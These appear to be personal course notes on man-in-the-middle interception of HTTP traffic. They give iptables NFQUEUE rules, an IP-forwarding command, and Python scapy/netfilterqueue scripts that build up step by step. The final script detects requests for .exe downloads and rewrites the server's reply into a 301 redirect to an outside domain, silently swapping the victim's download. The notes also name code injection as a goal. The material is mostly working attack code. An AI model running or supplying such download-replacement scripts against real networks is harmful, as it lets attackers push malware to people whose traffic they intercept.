# MODEFYING DATA IN HTTP-LAYER
MOTIVE:
- EDIT REQUEST/RESPONSES
- REPLACE DOWNLOAD REQUEST
- INJECT CODE(HTML/JS)
The Port number used for HTTP is 80
#IP-table FOR-REMOTE-PC
-RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
-RUN: iptables -I INPUT -j NFQUEUE --queue-num 0
#IP-table FOR-LOCAL-PC
-RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0
#INTERNET
echo 1 > /proc/sys/net/ipv4/ip_forward
# CODE:.SHOW()/HTTP
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
show all data related to http-
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80:
- print("HTTP Request")
- print(scapy_packet.show())
- elif scapy_packet[scapy.TCP].sport ==80:
- print("HTTP Request")
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
# CODE:MODEfy#2 [desire-extension]
can filter the .exe/- any -what u wish for/just replace
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- ack_list = []
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80:
- if ".exe" in scapy_packet[scapy.Raw].load:
- print("[+] exe Request")
- ack_list.append(scapy_packet[scapy.TCP].ack)
- print(scapy_packet.show())
- elif scapy_packet[scapy.TCP].sport ==80:
- if scapy_packet[scapy.TCP].seq in ack_list:
- ack_list.remove(scapy_packet[scapy.TCP].seq)
- print("HTTP Request")
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
# CODE:MODEfy#3
https://en.wikipedia.org/wiki/HTTP_301
changing the link by HTTP 301
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- ack_list = []
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80:
- if ".exe" in scapy_packet[scapy.Raw].load:
- print("[+] exe Request")
- ack_list.append(scapy_packet[scapy.TCP].ack)
- print(scapy_packet.show())
- elif scapy_packet[scapy.TCP].sport ==80:
- if scapy_packet[scapy.TCP].seq in ack_list:
- ack_list.remove(scapy_packet[scapy.TCP].seq)
- print("[+]Replacing file")
- scapy_packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: https://www.epicmovies4me.ml\n\n"
- del scapy_packet[scapy.IP].len
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.TCP].chksum
- packet.set_payload(str(scapy_packet))
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()